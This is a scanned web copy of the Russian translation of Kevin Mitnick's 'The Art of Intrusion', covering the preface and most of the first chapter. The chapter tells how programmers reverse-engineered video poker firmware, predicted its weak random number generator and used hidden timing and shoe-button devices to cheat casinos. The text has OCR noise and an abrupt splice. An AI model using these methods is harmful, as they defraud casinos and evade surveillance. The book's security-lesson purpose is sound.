WWW.KNIGA.LIB-I.RU
БЕСПЛАТНАЯ  ИНТЕРНЕТ  БИБЛИОТЕКА - Онлайн материалы
 

Pages:   || 2 | 3 | 4 | 5 |

«Кевин Митник ИСКУССТВО ВТОРЖЕНИЯ Академия АйТи 2005 г. УДК 004.056 ББК 32.973.202 М66 МитникК. Искусство вторжения:: Пер. с англ. — Семенова А.В. — М.: Компания ...»

-- [ Страница 1 ] --

Кевин Митник

ИСКУССТВО

ВТОРЖЕНИЯ

Академия АйТи

2005 г.

УДК 004.056

ББК 32.973.202

М66 МитникК.

Искусство вторжения:: Пер. с англ. — Семенова А.В. — М.:

Компания АйТи, ДМК Пресс, 2005. — 280 стр.

ISBN 5-98453-020-1

Истории, рассказанные в этой книге, демонстрируют, как небезопасны

все компьютерные системы, и как мы уязвимы перед подобными

атаками. Урок этих историй заключается в том, что хакеры находят

новые и новые уязвимости каждый день. Читая эту книгу, думайте не о том, как изучить конкретные уязвимости тех или иных устройств, а о том, как изменить ваш подход к проблеме безопасности и приобрести новый опыт.

Если вы профессионал в области информационных технологий или обеспечения безопасности, каждая из историй станет для вас своеобразным уроком того, как повысить уровень безопасности в вашей компании. Если же вы не имеете отношения к технике и просто любите детективы, истории о рисковых и мужественных парнях — вы найдете их на страницах этой книги.

Все права защищены. Любая часть этой книги не может быть воспроизведена в какой бы то ни было форме и какими бы то ни было средствами без письменного разрешения владельцев авторских прав.

Материал, изложенный в данной книге, многократно проверен. Но поскольку вероятность технических ошибок все равно существует, издательство не может гарантировать абсолютную точность и правильность приводимых сведений. В связи с этим издательство не несет ответственности за возможные ошибки, связанные с использованием книги.

All Rights Reserved. Authorized translation from the English language edition published by John Wiley & Sons, Inc.

© Kevin D. Mitnick, 2004 ISBN (англ.) 0-76456-959-7 © Wiley Publishing, Inc. 2005 ISBN (рус.) 5-98453-020-1 ©Перевод, оформление. Компания АйТи, 2005 © Издание. ДМК Пресс, 2005 Содержание Предисловие Глава 1. Ограбление казино на миллионы долларов 7 Глава 2. Когда террорист звонит 29 Хакерство в Техасской тюрьме 57 Глава 3.

Полицейские и воры 75 Глава 4.

Хакер Робин Гуд 99 Глава 5.

Мудрость и глупость проверок безопасности 125 Глава 6.

Глава 7. Вы уверены, что ваш банк безопасен, не правда ли? 151 Ваша интеллектуальная собственность Глава 8.

не в безопасности 165 Глава 9. На континенте 209 Глава 10. Социальные инженеры: как они работают и как их остановить 235 Глава

–  –  –

в се хакеры — и самые молодые и не очень - постоянно соревнуются друг с другом. Один из крупных призов в этом соревновании — возможность похвалиться проникновением на Интернет-сайт моей (Кевина Митника) компании, занимающейся безопасностью, или же на мой сайт.

Другой приз—хакерская история, рассказанная мне или моему соавтору Биллу Саймону так убедительно, чтобы мы, поверив в ее истинность, включили ее в эту книгу.

Все это представляло собой увлекательное занятие, игру умов, которой мы предавались долгое время, проводя многочисленные интервью для написания этой книги. Для большинства журналистов и авторов установление личности говорящего — дело совсем простое: действительно ли это тот человек, за которого себя выдает? Действительно ли он работает на ту компанию, о которой говорит? Действительно ли он занимает в ней тот пост, на который претендует? Есть ли у него документальные подтверждения рассказанной истории, и могу ли я удостовериться в их подлинности? Есть ли заслуживающие доверия свидетели всей его истории или хотя бы ее части?





Для хакеров ответить на эти простые вопросы совсем не так легко. Большинство из людей, чьи истории приведены в этой книге (за исключением тех немногих, кто уже сидит в тюрьме), должны были бы подвергнуться судебному преследованию, если бы их личность была установлена. Поэтому не надо пытаться узнать подлинные имена рассказчиков или искать доказательства изложенных фактов.

Все эти люди поделились своими историями только потому, что полностью доверяли мне. Они знали, что на меня можно положиться, и я их не предам. Именно поэтому, несмотря на весь риск, они рассказали о своих хакерских «достижениях».

Тем не менее, нельзя забывать о том, что рассказчики иногда кое-что преувеличивают, — для большей убедительности, а может быть, и вся история— выдумка, но построена на таких правдивых деталях, что выглядит правдой.

Осознавая, что такой риск есть, в процессе всех интервью я проверял достоверность каждой детали, требуя подробных доказательств тому, что вызывало хоть какое-то подозрение, и требуя повторных рассказов, чтобы удостовериться, что рассказанная второй раз история звучит в точности так же, как и в первый. У меня подозрения вызывало даже то, что рассказчик порой не мог вспомнить важные детали, или же объяснить, как он попал из точки А в точку В.

Если я специально не оговариваю в какой-то части истории, что она выдумана, значит — это правда. Мы с моим соавтором включили в эту книгу только истории тех рассказчиков, кому могли доверять. Тем не менее, мы часто меняли некоторые детали, чтобы защитить не только хакеров, но и их жертвы.

В то же время надо понимать, что производители ПО и оборудования постоянно повышают уровень безопасности, поэтому большинство из описанных здесь «лазеек» в системах безопасности уже устранены. Это может породить иллюзию того, что поскольку они устранены, то читателям и их компаниям не п о чем беспокоиться. Однако мораль этих историй, независимо от того, проиg зошли они шесть месяцев или шесть лет назад, заключается в том, что хакеры g находят новые и новые лазейки каждый день. Читая эту книгу, думайте не S о том, чтобы изучить конкретные уязвимые места тех или иных устройств, ф а как изменить ваш подход к проблеме безопасности и приобрести новый опыт.

Думаю, в процессе чтения книги вы испытаете удивление, восторг и даже восхищение фантастическими ухищрениями этих невероятно изобретательных хакеров.

Некоторые из них могут вас шокировать, другие — откроют глаза, а третьи — заставят рассмеяться над находчивостью этих ребят. Если вы профессионал в области информационных технологий (ИТ) или обеспечения безопасности, каждая из историй станет для вас своеобразным уроком того, как повысить уровень безопасности в вашей компании. Если же вы не имеете отношения к технике и просто любите детективы, истории о рисковых и мужественных парнях, то все это вы найдете на страницах этой книги.

В каждой из рассказанных историй ее герои постоянно существуют под страхом того, что полицейские или агенты службы безопасности постучат в дверь с наручниками наготове. И довольно часто именно так и происходит.

Для тех, кому повезло, остается возможность попадать в новые истории.

Как правило, участники событий, описанных в этой книге, никогда о них не рассказывали. Большинство из приключений, о которых вы прочтете, видят свет впервые.

глав Ограбление казино на миллионы долларов

–  –  –

в судьбе игрока всегда наступает такой момент, когда нервное напряжение материализуется в нечто реальное, азарт берет верх над осторожностью, и рулетка в казино становится похожа на гору, ждущую, чтобы ее покорили. В такой момент идея обхитрить рулетку или игральный автомат кажется вполне осуществимой.

Алекс Майфилд и три его приятеля сделали то, о чем многие могли бы только мечтать. Как и многие другие хакеры, они начали с простых мысленных упражнений и проверки их на правдоподобность. В конце концов, они победили систему казино и «облегчили»

его, по словам Алекса, примерно на миллион долларов.

В начале девяностых годов все четверо работали консультантами в сфере высоких технологий и считали свою жизнь скучной и обычной. «Что такое жизнь: вы работаете, зарабатываете деньги, потом перестаете работать и, наконец — умираете».

Лас-Вегас был от них очень далек, — где-то в кинофильмах и телевизионных шоу. Поэтому, когда им предложили разработать некоторое ПО и затем представить его на выставке в Лас-Вегасе, они с удовольствием согласились. Для каждого из них это был первый визит в Лас-Вегас, причем за чужой счет — кто откажется от этого? Отдельные номера для каждого из них в одном из лучших отелей ЛасВегаса позволяли Алексу взять с собой жену, а Майку — подружку.

Таким образом, две пары плюс Ларри и Марко готовились хорошо провести время в этом «городе греха».

По словам Алекса, они мало что знали об азартных играх и не знали, чего ждать от Лас-Вегаса: «Вы выходите из самолета и видите старушек, играющих в игральные автоматы, и постепенно заражаетесь всем этим»...

...После того как выставка завершилась, они сидели все вместе с двумя своими дамами в игровом зале своего отеля, поигрывали в автоматы и потягивали пиво, когда жена Алекса произнесла роковую фразу:

— Ребята, ведь эти машины построены на основе компьютеров, а вы — специалисты по компьютерам, так почему вы не можете сделать так, чтобы мы выигрывали почаще?

3 Ребята тут же направились в номер Марка и уселись в кружок, рассуждая о том, как могут быть устроены игральные автоматы.

то m

ИССЛЕДОВАНИЕ

Как говорится, процесс пошел. «Идея буквально втемяшилась в четыре наши головы и, вернувшись домой, мы начали ее обсуждать», — с удовольствием вспоминает Алекс эту креативную стадию всей истории. Очень быстро исследователи утвердились в своих начальных подозрениях: «Действительно, игральные автоматы основаны на компьютерных программах. Поэтому мы стали обдумывать способы взлома этих машин».

Есть люди, которые побеждают игральные автоматы, «заменяя программу», то есть, добираясь до компьютерного чипа в автомате и заменяя ПО на ту версию, которая будет выплачивать им большие выигрыши, чем предусматривает казино. Другие преуспевают в своем мошенничестве при помощи техника, обслуживающего автоматы. Для Алекса с приятелями такое грубое вмешательство в жизнь автомата было похоже на то, «как если бы мы ударили старушку по голове и отобрали у нее кошелек». Они рассматривали свою будущую «схватку» с казино, как своеобразный вызов своему интеллекту и программистским способностям. Кроме того, ни у кого из них не было талантов социального инженера — они были компьютерными специалистами и не знали, как втереться в доверие к сотруднику компании и убедить его реализовать схему изъятия некоторой суммы денег у казино.

Однако, как подступить к проблеме? Вот что вспоминает Алекс:

«Мы рассуждали о том, как мы могли бы предсказать возможные последовательности выпавших карт. Или же, о том, как отыскать «черный ход» (программное обеспечение, дающее возможность несанкционированного доступа к программе), который некоторые программисты могут использовать в своих целях. Все программы пишутся программистами, а программисты такие же люди, как и все мы. Мы думали о том, как можно было бы пробраться через заднюю дверь, нажимая определенный набор клавиш, или же отыскать определенные просчеты программистов, которые можно было бы использовать в своих интересах».

Алекс прочел в свое время книгу «The Eudaemonic Pie» Томаса Басса (Penguin, 1992), — историю о том, как компания компьютерщиков и физиков в восьмидесятые годы обыграла рулетку в ЛасВегасе при помощи собственного изобретения — переносного компьютера размером с пачку сигарет, который предсказывал цифры, которые выкидывала рулетка. Один из членов команды находился около стола и определял скорость вращения колеса рулетки и движения шарика по ней, а компьютер затем передавал по радио информацию другому члену команды, который делал соот- о ветствующую ставку. Они хотели забрать чемоданы денег, но им "g это не удалось. По мнению Алекса «у методики этих ребят был ь большой потенциал, но он не реализовался из-за достаточно слож- i ной и ненадежной технологии. Кроме того, в игре принимали * участие слишком много человек, поэтому вставала проблема s их контактов и взаимоотношений. Мы не должны были повторить их ошибок». ^ По мнению Алекса, победить компьютерную игру проще, «пос- § кольку действия компьютера полностью предопределены заложен- g ной в него программой» — каждое последующее действие основано J на результате предыдущих, можно выразить это в таком девизе: «хо- § рошие данные на входе — хорошие данные на выходе» (на самом ь деле, пословица компьютерных инженеров звучит так: «мусор на входе — мусор на выходе»).

С этими выводами были согласны и партнеры Алекса. Между прочим, Алекс был самым молодым из членов команды, он играл в рокгруппе и мечтал о карьере рок-звезды. Только после того, как эти мечты не сбылись, он занялся математикой. У него был настоящий талант к математике и, хотя он не утруждал себя лекциями и семинарами (его даже выгнали из колледжа), он изучил предмет настолько, что был в нем настоящим авторитетом.

Он решил, что имеет смысл провести серьезное исследование и отправился в Вашингтон, чтобы изучить патенты в библиотеке Патентного общества. «Я подумал, что автор патента мог быть настолько глупым, чтобы поместить в него подробный текст программы для автомата для игры в покер». Оказалось, что он был прав. «Помещение полного текста всех программ в патент было единственным способом защиты оригинальности своего изобретения, поскольку именно они и содержали подробное описание сути изобретения, правда, в форме, которая была непонятна большинству читателей. Никакого труда не составило получить микрофильмы со всеми кодами и скопировать их».

Анализ кодов помог выявить несколько деталей, которые они сочли интересными, но все пришли к выводу, что только работа с конкретными автоматами может приблизить их к желаемому результату.

Кстати, ребята отлично подходили для командной работы. Майк был очень способным программистом, гораздо более сильным в сфере дизайна оборудования, чем три его приятеля. Марко — еще один сильный программист, был эмигрантом из Восточной Европы и выглядел тинэйджером, но обладал совершенно дьявольской изобретательностью. Алекс хорошо разбирался в программировании и был 10 единственным, кто знал криптографию, очень нужную им. Ларри не слишком хорошо знал программирование, и не слишком хорошо *- двигался из-за последствий мотоциклетной аварии, но он был прекS расным организатором, который мог отслеживать все стадии проеки

- та, фокусируясь на том, кто и что должен сделать в тот или иной конкретный момент.

После первой исследовательской стадии проекта казалось, что Алекс к нему охладел, а Марко, наоборот, воодушевился. Он повторял: «Я не вижу большой проблемы: есть тринадцать штатов, где мы вполне легально можем приобрести игральный автомат». В конце концов, он уговорил всех остальных: «Мы решили, что можем рискнуть». Каждому пришлось внести свою долю на необходимые транспортные расходы и покупку автомата. Они еще раз отправились в Лас-Вегас, но на этот раз за собственный счет.

Алекс говорил: «Чтобы купить игровой автомат, надо предъявить документ с регистрацией в том штате США, где приобретение игровых автоматов — вполне законное дело. При наличии водительских прав, выданных в таком штате, все должно было пройти гладко».

Оказалось, что у одного из участников команды то ли дядя его знакомой девушки, то ли кто-то еще жил в Лас-Вегасе.

Для переговоров с этим человеком команда выбрала Майка, поскольку у него были самые хорошие манеры и вообще — он имел представительную внешностью. «Подобные покупки всегда были подозрительным делом, как и нелегальное приобретение оружия», — поясняет Алекс. Игровые автоматы часто приобретают нечестным путем — по незаконным каналам — чтобы использовать их в клубах и других местах. И, тем не менее, к его удивлению, такой автомат удалось купить.

За автомат японского производства пришлось заплатить 1500 долларов. «Мы поместили его на заднее сидение автомобиля и повезли домой так бережно, как будто у нас в машине был ребенок».

РАЗРАБОТКА ПРЕСТУПЛЕНИЯ

Майк, Алекс и Марко втащили автомат на второй этаж, и разместили в свободной спальне. Удивительное волнение перед началом работы с автоматом, по словам Алекса, запомнилось всем, как один из поворотных моментов в жизни.

«Мы открыли его, вытащили из него чипы памяти и процессор. Я подумал, что при производстве автомата на заводе крупной корпорации инженеры и сборщики вполне могли работать в режиме конвейера и потому быть немного ленивыми или невнимательными.

Они использовали чип 6809, аналогичный чипу 6502, который использовался в компьютерах Apple II или Atari. Это был 8-битный чип с размером памяти 64К. Он был хорошо знаком мне».

Машина, которую приобрели будущие хакеры, была одна из тех, о что использовалась в игровом бизнесе уже около десяти лет. Если ка- "g кое-то казино хочет приобрести автомат новой конструкции, то ко- ^ миссия по играм Лас-Вегаса должна тщательно изучить его програм- I мное устройство и убедиться в том, что его выплаты организованы g таким образом, что никто не будет обижен — ни игроки, ни казино. s Процесс одобрения нового автомата—долгое и нелегкое дело, поэтому ° казино стараются держаться за старые автоматы столько, сколько это *t возможно. Это играло на руку нашей команде хакеров, потому что они § справедливо надеялись, что более старые автоматы будут основаны на s устаревшей технологии, которую им легче будет победить. J Компьютерная программа, которую исследователи обнаружили § в чипе, состояла из череды нулей и единиц, то есть самого общего ви- ь да компьютерных инструкций. Перед тем, как приступить к измене- Е нию программы, надо было совершить, так сказать, «ретрансляцию», — операцию, которую совершают инженеры и программисты, когда хотят воссоздать процесс создания того или иного продукта;

в данном случае это означало перевод программных нулей и единиц в форму, с которой могут оперировать программисты.

Для совершения этой операции Алексу был нужен «антиассемблер».

Наша четверка не хотела приобретать эту программу законным путем, потому что это действие выглядело бы, как запрос в библиотеку о руководстве по изготовлению бомб. Ребятам пришлось написать собственный антиассемблер, Алекс описал этот процесс такими словами: «Это, естественно, была не легкая прогулка, но мы получили от этого занятия немало удовольствия».

После того, как компьютерные коды программы из покерного автомата были пропущены через новый антиассемблер, три программиста сели над ними, чтобы вникнуть в их суть. Обычно для профессионального программиста не составляет особого труда быстро отыскать в программе интересующие его секции. Так происходит, потому что программист, пишущий программу, расставляет на всем ее протяжении своеобразные «дорожные знаки» — метки, комментарии и объяснения того, как действует каждый из разделов. Это похоже на книгу, в которой есть заголовки частей, разделов, глав, а иногда и более мелких частей.

При переводе программы в цифровую форму, которую компьютер может понять, эти «дорожные знаки» игнорируются — ни компьютеру, ни микропроцессору они совершенно не нужны.

Поэтому, когда программа восстанавливается из машинных кодов при помощи антиассемблера, в ней нет ни одного традиционного пояснения; продолжая метафору «дорожных знаков», такой 12 восстановленный код можно сравнить с картой, на которой нет названий населенных пунктов и маркировки дорог.

Наши исследователи тщательно изучали страницы кодов на экране, стараясь отыскать ответ на простые вопросы: «Какова логика программы? Каким образом перемешиваются карты перед выбросом? Как фиксируется замена карт?» Но главной задачей на этом этапе был поиск генератора случайных чисел. Алекс предполагал, что японские программисты, написавшие программу, вполне могли допустить незначительные ошибки в написании этого самого генератора, и он не ошибся.

ПЕРЕПИСЫВАНИЕ КОДА

Алекс с гордостью описывал усилия команды на этом этапе: «Мы были профессиональными программистами, и все сделали хорошо.

Мы выяснили, как цифры кода программы превращаются в карты на табло игрального автомата, а затем написали небольшую добавку на языке С, которая делала то же самое», — говорил он.

«У нас был стимул для работы, и мы работали ночи напролет. Нам потребовалось около трех недель, чтобы досконально разобраться в том, как работает программа.

Для этого мы изучали текст, делали определенные предположения о его назначении, писали некоторые добавки к программе, помещали ее в ROM (компьютерный чип) и возвращали его в машину, а потом смотрели, что происходит. Например, мы написали специальную программу, которая располагала числа над изображением карт на экране. Так мы определили, каким образом программа оперирует с картами.

Наша работа шла по методу проб, ошибок, и постоянного анализа, достаточно быстро строки кода начали наполняться смыслом. Мы досконально разобрались в том, как числа в компьютерной программе превращаются в карты на экране.

Мы надеялись, что генератор случайных чисел будет устроен достаточно просто. Дело происходило в начале девяностых годов, и это было именно так. После небольшого анализа я понял, что мы имеем дело с генератором, который Дональд Кнут написал еще в 60-е годы. Авторы программы для игрового автомата не стали изобретать велосипед, а просто скопировали в свою программу имеющиеся разработки по методу Монте-Карло.

Мы точно установили, какой алгоритм использовали авторы программы в своем коде для случайной выборки карт; он назывался линейным регистром сдвига с обратной связью (linear feedback shift register) и это был очень хороший генератор случайных чисел (RNG)».

–  –  –

Итак, Алекс и его партнеры поняли, что программа в том автомате, который они изучали, недостаточно продумана. Из-за наличия ошибок стало ясно, что они могут написать несложный, но элегантный алгоритм, который поможет им победить машину.

Идея, по мнению Алекса, заключалась в том, чтобы начать игру, увидеть, какой набор карт выбросил автомат, и ввести эти сведения в свой компьютер. Затем с помощью разработанного алгоритма вычислить положение, в котором находится генератор случайных чисел, и определить, сколько ему еще номеров осталось до того, как будет выброшена комбинация, соответствующая королевскому флэшу.

«Итак, мы работали на нашей тестовой машине и пробовали нашу маленькую программу, которая точно предсказывала нам следующие последовательности карт. Возбуждение нарастало».

Алекс приписывает это возбуждение «осознанию того, что вы умнее кого-то и можете переиграть его. А в нашем случае еще и заработать немного денег».

Они отправились в магазин, отыскали там наручные часы Casio с возможностью отсчета десятых долей секунды и приобрели сразу три штуки для всех троих, кто собирался быть в казино; Ларри должен быть оставаться у компьютера.

14 Они были готовы начать проверку своего метода. Один из команды должен был начать игру и фиксировать набор карт, которые ему выбрасывал автомат — масть и старшинство каждой из пяти карт. Ларри вводил бы эти данные в их собственный компьютер; хотя их машина и не принадлежала к известным брэндам, это был очень приличный компьютер для их целей, поскольку его процессор был во много раз быстрее тех, что использовались в японских игральных автоматах.

Всего за несколько мгновений он вычислял точный момент времени, который должен быть установлен в один из секундомеров Casio.

Когда отсчет времени заканчивался, человек у игрового автомата должен был нажать кнопку «Игра». Это должно было произойти предельно четко, в течение доли секунды. Но это не было слишком сложной проблемой, как объяснил Алекс.

«Двое из нас какое-то время занимались музыкой. Если вы музыкант и у вас хорошее чувство ритма, то вы можете нажать кнопку в нужный момент в пределах десяти миллисекунд».

Если бы все сработало так, как предполагалось, то машина должна была выбросить игроку набор из пяти последовательных карт одной масти — королевский флэш.

Наши экспериментаторы попробовали этот трюк на своем автомате и практиковались до тех пор, пока каждый из них не научился добиваться выпадения королевского флэша практически с каждой попытки.

Несколько месяцев они, по словам Марка, «занимались восстановлением программы автомата, определяли, каким образом случайные числа превращаются в карты на экране автомата, установили точно, как и когда выбрасывает числа RNG, изучили все особенности автомата и создали программу, учитывающую все эти особенности, чтобы в любой момент времени знать состояние RNG на часы и даже дни вперед».

Они победили автомат и сделали его своим рабом. Они бросили настоящий хакерский вызов и выиграли. Это знание могло сделать их богатыми.

Как прекрасно было мечтать об этом. Удастся ли им реализовать свои мечты в дебрях казино?

НАЗАД В КАЗИНО - ВРЕМЯ ИГРАТЬ

Одно дело совершать любые махинации на автомате, стоящем в безопасном месте. Пробовать их в центре переполненного казино и красть у него деньги — это совсем другая история. Для этого нужны стальные нервы.

Их девушки считали все происходящее забавой. Ребята советовали им надеть обтягивающие шорты и вести себя повеселее — играть, 'шуметь, кривляться, заказывать выпивку — надеясь, что служба наблюдения казино, следящая за всем происходящим через камеры о наблюдения, будет отвлечена веселыми лицами и ужимками. «Поэто- "g му мы поощряли такой стиль поведения, как только могли», — вспо- ь минал Алекс. I Они надеялись, что смогут смешаться с толпой. «Лучшим для та- * кой цели был Макс. У него совершенно незапоминающееся лицо, и s они с женой выглядели, как типичные посетители казино».

Алекс описывал сцену так, как если бы все происходило вчера. ^ У Марко и Майка это получалось по-другому: дело в том, что Алекс со § своей женой Энни были первыми, кто совершал попытку единобор- g ства с покерным автоматом в казино. Он должен был с высокой точ- J ностью знать цикл срабатывания автомата. Одним из способов, § которым они старались достичь этого знания, была видеокамера ь в рюкзаке; в казино надо было направить видеокамеру на экран покерного автомата и некоторое время снимать происходящее на видеокассету. «Это совсем не просто, — вспоминал Алекс, — ориентировать рюкзак в нужном направлении, не видя результата; при этом надо было себя вести естественно, чтобы не выглядеть подозрительно и не привлекать внимания». Майк предпочитал другой, менее сложный, метод: «Временной цикл для неизвестного игрального автомата можно определить, если зафиксировать выбрасываемые им карты всего дважды, но через много часов». При этом он должен быть «Я подумал о том, что казино проводит эту проверку из-за тех ребят, которые действительно подменяли программу в автомате.

Не представляю, как им удавалось сделать это и не быть пойманными». По мнению Алекса, они применяли методы социальной инженерии, обманывали охрану и давали взятки кому-то в казино.

Он подозревал, что они могли подменить даже тот «золотой эталон», с которым сверялись чипы в машине при крупном выигрыше.

Прелесть работы его команды, по мнению Алекса, была в том, что они никоим образом не вмешивались в работу автомата. По их мнению, их подход был куда более гибким.

Естественно, ребята не могли постоянно выигрывать; они были уверены: «в конце концов, кто-то скажет — «Эй, мы уже видели этих ребят». Мы все время опасались того, что нас поймают».

Кроме боязни быть пойманным за мошенничество, они были озабочены и налоговыми проблемами: любого, кто выигрывал более 1200 долларов, казино просило предъявить документы и докладывало о выигрыше в налоговые органы. Майк вспоминает: «Мы полагали, что налоги автоматически будут вычитаться из выигрыша, если у игрока нет удостоверения личности. Но мы не хотели привлекать к себе внимание. Заплатить налоги не было проблемой, но при этом создавалась запись о том, что вы выиграли большую сумму денег. Мы стали напряженно думать о том, как избежать «засвечиваго НИЯ».

*- Надо было искать другой подход. После достаточно короткого периода раздумий они начали разрабатывать новую идею.

НОВЫЙ ПОДХОД

У ребят тогда было две цели: разработать метод, который позволил бы им гарантированно выигрывать заметные суммы с помощью выигрышных комбинаций в покере, но сделать выигрыши не такими большими, чтобы они привлекали внимание окружающих. И путь к этому выигрышу должен быть совсем незаметным, без постоянной беготни к телефону.

Поскольку в казино есть лишь небольшое число японских автоматов, наша команда обратила свое внимание на гораздо более распространенные американские автоматы. Они приобрели его и разобрали уже испытанным путем и обнаружили, что генерация случайных чисел в нем происходит гораздо более сложным образом: машина одновременно использует два генератора, работающих совместно друг с другом. «Программисты, готовившие этот автомат, были уже осведомлены о возможностях жульничества с простыми генераторами», — пришел к выводу Алекс.

Тем не менее, и в этом случае разработчики автомата сделали фатальную ошибку. «Они прочли статью, в которой говорилось, что вы повысите уровень случайности чисел, если используете второй генератор, но они воплотили идею неправильным образом». Чтобы определить выбрасываемую карту, они складывали число из первого генератора с числом из второго генератора.

Правильно было бы менять число из второго генератора после каждой карты. Конструкторы автомата не сделали этого; они меняли его только перед выбросом каждой пятерки карт, так что к выброшенному числу первого генератора для каждой карты из пятерки прибавлялось одно и то же число из второго генератора.

Для Алекса использование двух генераторов было своеобразным криптографическим вызовом; он вспомнил, что аналогичный прием иногда используется при шифровании текстов. Однако он не помнил, как надо действовать в подобных случаях и для повышения квалификации стал ходить в библиотеку соседнего университета.

«Если бы создатели программ для автоматов читали книги по криптографии более тщательно, они бы не сделали этой ошибки. Кроме того, они более внимательно проверяли бы свою систему на возможность взлома и не оставили нам лазейки.

Любой компьютерный инженер смог бы написать программу и сделать то, что сделали мы, поняв, что от него требуется. Самой сложной частью работы было создание быстродействующего алгоритма, чтобы всего за о несколько секунд вы могли понять, что происходит; если создавать та- "g ь1 кой алгоритм недостаточно тщательно, он мог работать несколько часов перед тем, как выдать решение. I Мы все были хорошими программистами, и работа была существенной * частью нашей жизни, поэтому мы все сделали правильно. Но это было s совсем не просто». °

–  –  –

бит. Государственный стандарт шифрования использует 56-битный ключ, который считается практически не взламываемым, поэтому Norton гарантировал своим пользователям ощущение защищенности. Из-за ошибки программистов на самом деле данные пользователя шифровались при помощи ключа в 30 бит, а не 56. Даже в те годы 30битный ключ можно было взломать простым «методом грубой силы»

(так называется метод последовательного перебора вариантов — прим. переводчика). Любой человек, используя этот продукт, ошибочно думал, что он находится в полной безопасности: атакующий вполне мог сломать ключ шифрования достаточно быстро и получить доступ к данным пользователя. Примерно такую же ошибку обнаружили наши ребята и в программе игрального автомата.

Параллельно с работой над компьютерной программой, которая позволила бы им победить новый игральный автомат, ребята заставляли Алекса думать над новой моделью поведения, чтобы не приходилось постоянно бегать к телефону. Ответом стала страница из книги «Endaemonic Pie» — карманный компьютер. Алекс разработал систему, сделанную из миниатюрного компьютера, который Майк и Марко отыскали в каталоге. В этой системе управляющая кнопка была упрятана в ботинок, а для приема сигнала использовался виброзвонок от сотового телефона. «Нам пришлось немало поработать над тем, чтобы построить систему на основе маленького чипа и маленькой памяти», — рассказывает Алекс. «Мы создали прекрасную эргономичную систему, которая помещалась в ботинке». Вероятно, под словом «эргономичный» он подразумевает то, что его устройство было настолько маленьким, что не натирало ногу при ходьбе!

20 НОВАЯ А Т А К А Началась отработка новой схемы работы, и это был достаточно нервный процесс. Они избавились от необходимости бегать к телефону перед каждым выигрышем. Но даже после многочисленных тренировок в домашних условиях, «работа» в реальных условиях происходит перед огромной аудиторией, существенная часть которой очень подозрительно к вам относится.

На этот раз программа была разработана так, что ребята могли сидеть у автомата, не отходя от него, осуществляя целую серию небольших менее подозрительных выигрышей. Алекс и Майк вспоминают некоторые непростые моменты в процессе «работы».

Алекс: «Я обычно помещал свой компьютер в корпус маленького транзисторного приемника. Провод от него шел через носок в ботинок к управляющей кнопке».

Майк: «Я приматывал провод к лодыжке. Мы изготавливали переключатели из небольших кусочков материала, который используется для изготовления интегральных схем. Эти переключатели были размером два на два сантиметра, с небольшой кнопкой. Затем мы вырезали такого же размера дыру в стельке и помещали переключатель в ботинок. Он доставлял неудобство только в том случае, если вам приходилось целый день носить его - мог натереть пальцы».

Алекс: «Итак, мы входили в казино и старались выглядеть максимально спокойно, а действовать так, как будто никаких проводов в наших ботинках не было. Мы подходили к автомату и начинали играть. Для передачи сигналов у нас была разработана система, аналогичная азбуке Морзе.

Мы начинали играть и передавали значения выпавших карт при помощи кнопки в ботинке.

Сигнал от этой кнопки шел в компьютер, лежащий в кармане. Для точного определения места, в котором находился генератор случайных чисел, надо было дождаться выброса восьми карт. Пять карт автомат выбрасывал для начала игры, а следующие три мы получали, попросив его заменить три карты для продолжения игры».

Майк: «Наш код для передачи информации о выпавших картах был двоичным, кроме того, он использовал технологию сжатия информации под названием код Хафмана. Например, длинный и короткий сигнал означал один-ноль, то есть два в двоичной системе. Длинный-длинный означал три и т.д. Для обозначения любой карты требовалось не более трех нажатий».

Алекс: «Нажатие кнопки в течение трех секунд означало прерывание информации. Если компьютер выдавал вам три коротких сигнала - пи-пипи - это означало, что вам пора переходить к решительным действиям.

Естественно, этому пришлось поучиться, и мы практиковались делать это, например, поддерживая беседу с посетителями или служащими казино.

Однажды я передал информацию о восьми картах и получил в ответ через минуту три коротких гудка. Я был готов к действиям.

В этот момент компьютер в кармане обнаружил место в алгоритме, о которое соответствовало выкинутым картам. Алгоритм в карманном "g компьютере был аналогичен алгоритму в игральном автомате, поэто- ^ му компьютер в кармане «знал», какие карты будут выброшены авто- 1 матом в следующий раз.

Поэтому он мог вам дать совет, какие карты * надо придержать, а какие — поменять, чтобы получить в результате выигрышную комбинацию, продолжал свой рассказ Алекс:

«Компьютер говорил, что надо делать, посылая сигналы на вибратор ^ в кармане, который мы пристроили к нему, вытащив из старого пейдже- § ра. Если компьютер хотел, чтобы вы держали третью и пятую карту, он s сигналил бип, бип, би-и-и-п, бип, би-и-и-п, - что вы ощущали, как виб- J рацию в кармане. g Если играть внимательно, то вероятность выигрыша при нашей методи- | ке возрастала до сорока процентов, в то время как при игре в блэк-джек она не превышала двух с половиной процентов. При нашей методике игры, если вы дважды в минуту заряжали в автомат пятидолларовую монету, то могли выигрывать двадцать пять долларов в минуту. За полчаса вы могли запросто «надуть» автомат на тысячу долларов. Некоторым людям удавалось сделать это абсолютно честно, но таких было не более пяти процентов от общего числа игроков. Причем им далеко не всегда удавалось повторить свой успех в следующие полчаса. А мы попадали в эти пять процентов счастливцев каждый раз».

Когда один из игроков выигрывал достаточно много денег в одном казино, он перемещался в другое. Каждому позволялось за день обходить не более четырех-пяти мест. Когда через месяц они возвращались в то казино, где уже играли, они старались приходить в другое время или дожидались другой смены дежурных, чтобы минимизировать вероятность узнавания. Им пришлось осваивать и другие города — Рено, Атлантик-Сити, — далее везде.

Их постоянные выигрыши стали обычным делом. Наконец Майк решил, что пришел момент, о котором они долго думали, и он перешел к автомату, где ставка составляла 25 долларов. Проблема состояла в том, что наблюдение за этими автоматами велось гораздо тщательнее.

«Естественно, я волновался, но все шло гладко. Я выиграл около пяти тысяч буквально за несколько минут. И в это мгновение один из служащих с очень внушительным видом положил мне руку на плечо. Я почувствовал, как сердце у меня уходит в пятки - «Началось...»

- Я вижу, вы неплохо выиграли, - сказал он. - Какой цвет вам больше нравится - розовый или зеленый?

Господи, что же это значит, судорожно думал я. «Неужели я должен выбрать цвет, до которого они меня будут избивать?» Я был готов отдать 22 весь выигрыш, только бы меня отпустили с миром. Пришлось собрать волю в кулак и продолжить разговор с этим мужчиной. «Мы хотим предложить вам выпить чашку кофе за счет заведения», - сказал тот. Я выбрал зеленую кружку».

